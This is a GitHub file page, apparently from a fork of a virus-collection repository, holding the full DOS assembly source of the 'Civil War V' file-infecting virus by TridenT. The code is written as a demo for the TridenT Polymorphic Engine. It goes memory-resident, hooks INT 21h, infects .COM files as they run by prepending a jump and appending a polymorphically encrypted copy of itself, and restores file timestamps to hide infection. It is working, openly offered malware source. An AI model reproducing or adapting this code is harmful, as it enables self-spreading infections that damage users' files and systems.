forked from guitmz/virii
-
Notifications
You must be signed in to change notification settings - Fork 0
/
Copy pathCivil510.asm
executable file
·337 lines (268 loc) · 8.12 KB
/
Civil510.asm
1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
21
22
23
24
25
26
27
28
29
30
31
32
33
34
35
36
37
38
39
40
41
42
43
44
45
46
47
48
49
50
51
52
53
54
55
56
57
58
59
60
61
62
63
64
65
66
67
68
69
70
71
72
73
74
75
76
77
78
79
80
81
82
83
84
85
86
87
88
89
90
91
92
93
94
95
96
97
98
99
100
101
102
103
104
105
106
107
108
109
110
111
112
113
114
115
116
117
118
119
120
121
122
123
124
125
126
127
128
129
130
131
132
133
134
135
136
137
138
139
140
141
142
143
144
145
146
147
148
149
150
151
152
153
154
155
156
157
158
159
160
161
162
163
164
165
166
167
168
169
170
171
172
173
174
175
176
177
178
179
180
181
182
183
184
185
186
187
188
189
190
191
192
193
194
195
196
197
198
199
200
201
202
203
204
205
206
207
208
209
210
211
212
213
214
215
216
217
218
219
220
221
222
223
224
225
226
227
228
229
230
231
232
233
234
235
236
237
238
239
240
241
242
243
244
245
246
247
248
249
250
251
252
253
254
255
256
257
258
259
260
261
262
263
264
265
266
267
268
269
270
271
272
273
274
275
276
277
278
279
280
281
282
283
284
285
286
287
288
289
290
291
292
293
294
295
296
297
298
299
300
301
302
303
304
305
306
307
308
309
310
311
312
313
314
315
316
317
318
319
320
321
322
323
324
325
326
327
328
329
330
331
332
333
334
335
336
337
;****************************************************************************
; Civil War V V1.0 *
; *
; Assembled with Tasm 2.5 *
; (c) Jan '93 [ Dark Helmet / TridenT ], The Netherlands *
; *
;****************************************************************************
; *
; This is an example virus for the TPE engine. *
; We are not responsible if you use the TPE in an illegal or naughty way. *
; The TridenT Polymorpic Engine version 1.3 should be used for linking *
; with this virus. *
; *
;****************************************************************************
.model tiny
.radix 16
.code
org 100h
extrn rnd_init:near
extrn rnd_get:near
extrn crypt:near
extrn tpe_top:near
len equ offset tpe_top - begin
dummy: db 0e9h, 03h, 00h, 44h, 48h, 00h ; Jump + infection
; marker
begin: Call virus ; make call to
; push IP on stack
virus: pop bp ; get IP from stack.
sub bp,offset virus ; adjust IP.
restore_host: mov di,0100h ; recover beginning
lea si,ds:[carrier_begin+bp] ; of carrier program.
mov cx,06h
rep movsb
check_resident: mov ah,0a0h ; check if virus
int 21h ; already installed.
cmp ax,0008h
je end_virus
adjust_memory: mov ax,cs ; start of Memory
dec ax ; Control Block
mov ds,ax
cmp byte ptr ds:[0000],5a ; check if last
; block
jne abort ; if not last block
; end
mov ax,ds:[0003] ; decrease memory
sub ax,200h ; by X kbyte lenght
mov ds:[0003],ax
sub word ptr ds:[0012],200h
install_virus: call RND_init
mov bx,ax ; es point to start
mov ax,es ; virus in memory
add ax,bx
mov es,ax
mov cx,len ; cx = lenght virus
mov ax,ds ; restore ds
inc ax
mov ds,ax
lea si,ds:[begin+bp] ; point to start virus
lea di,es:0100 ; point to destination
rep movsb ; copy virus in
; memory
mov [virus_segment+bp],es ; store start virus
; in memory
mov ax,cs ; restore es
mov es,ax
hook_vector: cli ; no interups
mov ax,3521h ; revector int 21
int 21h
mov ds,[virus_segment+bp]
mov old_21h-6h,bx
mov old_21h+2-6h,es
mov dx,offset main_virus - 6h
mov ax,2521h
int 21h
sti
abort: mov ax,cs
mov ds,ax
mov es,ax
end_virus: mov bx,0100h ; jump to begin
jmp bx ; host file
;*****************************************************************************
main_virus: pushf
cmp ah,0a0h ; check virus call
jne new_21h ; no virus call
mov ax,0008h ; ax = id
popf ; return id
iret
new_21h: push ds ; save registers
push es
push di
push si
push ax
push bx
push cx
push dx
check_exec: cmp ax,04b00h ; exec function?
je chk_com
continu: pop dx ; restore registers
pop cx
pop bx
pop ax
pop si
pop di
pop es
pop ds
popf
jmp dword ptr cs:[old_21h-6]
chk_com: mov cs:[name_seg-6],ds
mov cs:[name_off-6],dx
cld ; check extension
mov di,dx ; for COM
push ds
pop es
mov al,'.' ; search extension
repne scasb ; check for 'COM"
cmp word ptr es:[di],'OC' ; check 'CO'
jne continu
cmp word ptr es:[di+2],'M' ; check 'M'
jne continu
own_stack: cli
mov cs:[old_sp-6],sp
mov cs:[old_ss-6],ss
mov ax,cs
add ax,150h
mov ss,ax
mov sp,100h
sti
call set_int24h
call set_atribuut
open_file: mov ds,cs:[name_seg-6]
mov dx,cs:[name_off-6]
mov ax,3D02h ; open file
call do_int21h
jc close_file
mov cs:[handle-6],ax
mov bx,ax
call get_date
check_infect: mov bx,cs:[handle-6] ; read first 6 bytes
mov ah,3fh
mov cx,06h
lea dx,cs:[carrier_begin-6]
call do_int21h
push cs
pop ds
mov al, byte ptr [carrier_begin-6]+3 ; check initials
mov ah, byte ptr [carrier_begin-6]+4 ; 'D' and 'H'
cmp ax,cs:[initials-6]
je save_date ; if equal already
; infect
get_lenght: mov ax,4200h ; file pointer begin
call move_pointer
mov ax,4202h ; file pointer end
call move_pointer
sub ax,03h ; ax = filelenght
mov cs:[lenght_file-6],ax
call write_jmp
call write_virus
save_date: mov bx,cs:[handle-6]
mov dx,cs:[date-6]
mov cx,cs:[time-6]
mov ax,5701h
call do_int21h
close_file: mov bx,cs:[handle-6]
mov ah,03eh ; close file
call do_int21h
mov dx,cs:[old_24h-6] ; restore int24h
mov ds,cs:[old_24h+2-6]
mov ax,2524h
call do_int21h
restore_stack: cli
mov sp,cs:[old_sp-6]
mov ss,cs:[old_ss-6]
sti
jmp continu
new_24h: mov al,03h
iret
;---------------------------------------------------------------------------
; PROCEDURES
;---------------------------------------------------------------------------
move_pointer: push cs
pop ds
mov bx,[handle-6]
xor cx,cx
xor dx,dx
call do_int21h
ret
do_int21h: pushf
call dword ptr cs:[old_21h-6]
ret
write_jmp: mov ax,4200h ; goto begin of file
call move_pointer
mov ah,40h ; write JMP instruction
mov cx,01h
lea dx,[jump-6]
call do_int21h
mov ah,40h ; write JMP offset
mov cx,02h
lea dx,[lenght_file-6]
call do_int21h
mov ah,40h ; write initials
mov cx,02h
lea dx,[initials-6]
call do_int21h
ret
write_virus: mov ax,4202h ;goto end of file
call move_pointer
TPE_engine: mov ax,cs ;ES points to
add ax,90h ;worksegment
mov es,ax
push cs ;DS:DX code to encrypt
pop ds
mov dx,100h
mov bp,[lenght_file-6] ;BP start of encryptor
add bp,103h
mov cx,len ;lenght code to encrypt
xor si,si ;distance encryptor/
;decryptor = 0
call rnd_get ;AX = type of
call crypt ;encryption
mov bx,cs:[handle-6] ;write virus
mov ah,40h ;at end of file
call do_int21h
ret
get_date: mov ax,5700h
call do_int21h
push cs
pop ds
mov [date-6],dx
mov [time-6],cx
ret
set_int24h: mov ax,3524h ; hook int 24h
call do_int21h
mov cs:[old_24h-6],bx
mov cs:[old_24h+2-6],es
mov dx,offset new_24h-6
push cs
pop ds
mov ax,2524h
call do_int21h
ret
set_atribuut: mov ax,4300h ; get atribuut
mov ds,cs:[name_seg-6]
mov dx,cs:[name_off-6]
call do_int21h
and cl,0feh ; set atribuut
mov ax,4301h
call do_int21h
ret
;---------------------------------------------------------------------------
; DATA
;---------------------------------------------------------------------------
virus_name db "Civil War V v1.0, (c) Jan '92"
old_21h dw 00h,00h
old_24h dw 00h,00h
old_ss dw ?
old_sp dw ?
carrier_begin db 090h, 0cdh, 020h, 044h, 048h, 00h
jump db 0e9h
name_seg dw ?
name_off dw ?
virus_segment dw ?
lenght_file dw ?
handle dw ?
date dw ?
time dw ?
initials dw 4844h
writer db "[ DH / TridenT ]"
end dummy